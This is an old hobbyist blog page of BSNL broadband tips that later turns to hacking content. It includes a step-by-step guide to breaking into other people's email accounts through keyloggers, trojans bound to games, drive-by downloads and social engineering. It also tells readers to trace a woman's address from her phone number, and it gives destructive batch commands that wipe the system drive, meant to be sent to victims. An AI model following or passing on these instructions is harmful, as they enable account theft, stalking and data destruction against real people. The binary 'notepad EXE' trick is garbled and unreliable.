This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

BSNL Dataone tips & Tricks

Dataone Usage Finder

Check your BSNL dataone bandwidth usage with this software. It is downloadable from Dataone Usage Finder. The latest version will provide you the bill details too.



Another tip to save bandwidth (not only BSNL broadband)
Use a GOOD Anti Virus

But how can anti virus help me to save bandwidth?
Most of the modern day virus and trojans are capable of auto-updating themselves. There are also similat malicious programs which send out data packets without your knowledge. And this will increase the bandwidth usgae and will give you a huge bill. This is where a good anti virus can help. Unfortunately, most of the anti-viruses available today are costly and are not affordable for common man in India. But, we have many good anti virus softwares which are available for free. And, they are as good as the paid ones and some outperforms the paid counterparts.

Here is a list of some free anti virus softwares.

Avast!-The Best one (We reccomend this one)

AVG

Anti-vir



And never use two anti-virus softwares simulatenously. Doing so will not help you much and also they eat up a lot of system resources. Though you can use anti-spywares along with it. And we reccomend to use ananti-spyware along with the anti virus software.

Here is a list of some FREE anti-spyware softwares.


Spybot S&D

Ad-Aware



So, install these, and update to latest definitions, do a complete system scan. Remove all those infections and notice the change in bandwidth usage and download / upload speed.





Configuring BSNL Dataone on SmartAX MT882 ADSL Router
This tutorial will help you to configure, SmartAX MT882 for manual dial....and the advantages??...more flexibility over the connection...

1) Select TCP/IP properties and enter as follows

set ip Address As 192.168.1.29
Subnet Maswk As 255.255.255.0
Default Gategay As 192.168.1.1
Prefferd DNS 61.1.96.69
Alternet DNS 61.1.96.71

2) Save settings and restart the computer.
3) Open your browser (preferably Internet Explorer ) and goto http://192.168.1.1/
4) Input as follows
USERNAME: admin
PASSOWRD: admin
5) Now goto Home->WAN Settings and there,

PVC Number - PVC-0
Wan Type - RFC2684Bridged
VPI/VCI - 0/35
Encap. - LLC

Apply and restart the modem.

6) Now goto Control Panel-->Network Connections
7) Create New connection-->(and a wizard will pop up) Next-->Connect to Internet(Select the radio button and click next)-->Setup My connection Manually(select it and click next)-->Connect using a broadband connection that requires a user name and password (select it and click next)-->ISP name (type something, anything and click next)-->Type in the Username and password given to you in the specified coloumns also select the other options if you want to (and click next)-->If you want to add a shortcut of connection to desktop, check that square box and click finish.

Diouble Click the Icon in the desktop to connect to the BSNL Dataone broadband connection, and either double click the same icon or right click the system tray icon to disconnect from BSNL Dataone broadband connection.



Improve the broadband performance in Windows XP/2003
Well, before doing this....do this test

1) Goto http://www.testmy.net/ and click on Download Speed Test, and then on Smart Test....(and while conducting this test, don't forget to close all Instant Messagers, and there should be no other web activity, other than the test)

2) Note down the speeds.


Now, lets see, what all changes to be made.....

This tip is designed for increased BROADBAND speed in Windows XP while using standard Network Interface cards (NIC) that are connected to ADSL modems, or when using any directly-connected USB ADSL modem.

To speed up the Internet connection speed we need to configure a special buffer in the computer's memory in order to enable it to better deal with interrupts made from the NIC or the USB modem.

This tip is only recommended if you have 256MB RAM or higher.

Step #1 - Identify the IRQ used by the NIC/USB modem

1. Open the System Information tool by running MSINFO32.EXE from the Run command.
2. Expand System Summary > Hardware Resources > IRQs.
3. Look for the listing made for your NIC (in my case - a Intel® PRO/100+ Management Adapter). Note the IRQ next to the specified line (in my case - IRQ21).

In case of USB modems you will first need to find the right USB device used by your modem. Follow these steps:

1. Open the Device Manager tool by running DEVMGMT.MSC from the Run command (or by right-clicking My Computer > Hardware tab > Device Manager button).
2. Scroll down to Universal Serial Bus controllers and expand it.
3. Right-click the USB Root Hub and select Properties. Note that you might need to do so for all listed USB Root hubs (if there are more than one) in order to find the right one.
4. In the Power tab, look for your USB ADSL modem.
5. In the Resources tab look for the assigned IRQ (in this case - IRQ21).
6. This is the IRQ we're looking for.

Note: IRQs and modem names might vary...

Step #2 - Modify the system.ini file

1. Run SYSEDIT.EXE from the Run command.
2. Expand the system.ini file window.
3. Scroll down almost to the end of the file till you find a line called [386enh].
4. Press Enter to make one blank line, and in that line type IrqX=4096 where X is the designated IRQ number we found in step #1, in my case it's IRQ21.

Note: This line IS CASE SENSITIVE!!!

5. Click on the File menu, then choose Save.
6. Close SYSEDIT and reboot your computer.

Done. Speed improvement will be noticed after the computer reboots.

NOW DO THE SPEED TEST AGAIN (MENTIONED IN THE BEGINNING) AND NOTICE THE CHANGE IN SPEED

The most speed improvement is visible with USB.

WARNING:- It worked for me....am not sure whether it will work for you...






Save bandwidth (For Firefox users)
The trick is same as that of Internet Explorer. Well, in this case it can be done using an Firefox extension called Flashblock.

WARNING:- Never install this extension, if your Firefox version is below 1.5 and in such a case, upgrade the browser and then install this plugin.

Restart the browser and you will be amazed to see, the flash ads being blocked. This plugin also has the option to exempt some sites (likeonline greeting sites etc) from block.

And this Firefox extension successfully blocks the following:

Macromedia Flash

Macromedia Shockwave

Macromedia Authorware


To know more about this firefox extension, please visit http://flashblock.mozdev.org/

Speed Up BSNL Dataone Broadband Connection

In this article I will discuss 3 important tips to significantly speed up your internet access through BSNL Dataone broadband connection. Tip 1: One of the major problems with BSNL Dataone Broadband connection is the DNS servers they provide by default. Most of the time they are very slow and sometimes they fail to respond. I noticed that I am starting to spend a significant amount of time in DNS resolution with Dataone connection, often it is larger than the time it takes to actually get the reponse. Here is a simple solution to significantly speed up your DNS resolution. Open up the network connection profile and edit TCP/IP settings. In the DNS server address fields, specify the following DNS server addresses: 208.67.222.222 and 208.67.220.220
Disconnect the connection and then connect again. You are done. This specifies third party DNS servers which are significantly faster than BSNL Dataone’s DNS servers. Note: The service is provided by OpenDNS. Tip 2: Firefox users can use FlashBlock extension to prevent downloading of Flash content by default, thereby significantly speeding up browsing experience. You can click on the placeholder icon to display the original Flash content any time. This is more of a passive tip in that reduces data usage to improve your overall experience. Tip 3: You can try to increase your broadband bandwidth tweaking the TCP/IP parameters. The process is simplified by using TCPOptimizer, a free tool. It helped me, your mileage may vary.

Find BSNL Phone No's Address.

Wanna know Address of the girl you like?, or address of your friend?. It is so easy to trace the addresses, just you need is their phone number.

EXAMPLE: For tracing the address of a number located in Madhya Pradesh (India) just log in to http://www.bsnl.co.in/onlinedirectory.htm

After logging in, select the area (city) to which the phone number belong and then proceed further.

In the option "Search by" , select Telephone number. select the station to which the phone no. belongs and finally write the phone number in the "Search key field" . In this way the address of that particular number will be traced.

For selecting any other state of India, log on to http://www.bsnl.co.in/index.html . In the Right hand side you see the "BSNL units" option (above Username field), select your state from the menu and then proceed further.

NOTE : Try both, number including (2) as well as number excluding (2) as a prefix.

Hack for Make FREE Calls.

ES it is possible for you to make free phone calls both from your & PC. Login to http://www.minowireless.com/ ; complete the sign up process. Once you get registered then you can make free calls from your mobile or even via web.... For making free phone calls from your mobile download the Minowireless software on your mobile either from their Website or from http://www.getjar.com/ After installing the software, activate it by entering the PIN no. given to you at the time of registration. And now you can make free calls from your mobile.

RapidShare hack for free account(RapidShare HACKING)

Most Trusted n Complete Working HACK








Simply Copy the CODE given below
Open Command prompt. ( run ->cmd )
Paste the Content There. [ Hope u know how to paste on the cmd Prompt ]
Now try the rapidshare link again
and it wont ask you to Wait for more than ONE minute.







@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
exit






well it is known trick now nothing new in it

but

Keep checking this page for working Premium Rapidshare "user id" and "passwords"

Keep posting if u know more
thanks



You may also try this link!

Click here : Shankha(Fainted brain)



New working trick .. genuine


After searching a lot i found dis amazing thing. its like a proxy browser called TORPAK..it can change ur permanent IP to static IP. so jus wen u restart ur browser u will hav new IP... u can also set intervals between changing ur proxy...so now download mutliple files at d same time......it also has integration of IDM with it..





tip:

u have to close this perticular browser than open again and it will start downloading from RAPIDSHARE again no need to disconnect..
easy..

google it download n ~cheers~


Easy Way to Delete Rapidshare Cookie

If you logged into Rapidshare with an account that was detected by fraud detection you will need to delete the Rapidshare cookie. You could either:
Delete all the cookies, but this will makeyou have to login back into every website that you told the browser to auto login for you.
Go through every cookie and find that one rapidshare cookie.




So, here comes this little trick! You could bookmark this link and click it every timeyou need to delete ONLYRapidshare cookie:


http://rapidshare.de/cgi-bin/premium.cgi?logout=1

How to Break Into Email Accounts

do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life !
Beware !!



This is a Genuine Article.
Will try to add in as much as possible
keep posting !
comment on this article





Introduction


I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harrassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account.


Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when persuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...



Things You Should Know


As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.



If You Have Physical Access


I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.


One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at www.blazingtools.com/bpk.html). It works just fine, and has some nice options to keep it hidden from your average end user (computer user).


Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on www.zeropaid.com for different file sharing clients you can try).


Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in

C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....



www.download-freeware-shareware.com/Freeware-Internet.php?Type=4171



Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.



One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...




Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it




Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...




If You Don't Have Physical Access



Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.


To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...



On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).


If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.


The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.


So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.


Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.


Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...




While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...


http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8


Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.

If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.

First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).


Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...

Format a HDD with notepad

Step 1.
Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000


Step 2.
Save As An EXE Any Name Will Do


Step 3.
Send the EXE to People And Infect


OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000



format a:\ /Q/X -- this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000



del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001


try to figure out urself rest
cant spoonfeed
its workin


Do not try it on ur PC. dont mess around this is for educational purpose only

still if u cant figure it out try dis

go to notepad

@Echo off
Del C:\ *.*|y

save it as Dell.bat


worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file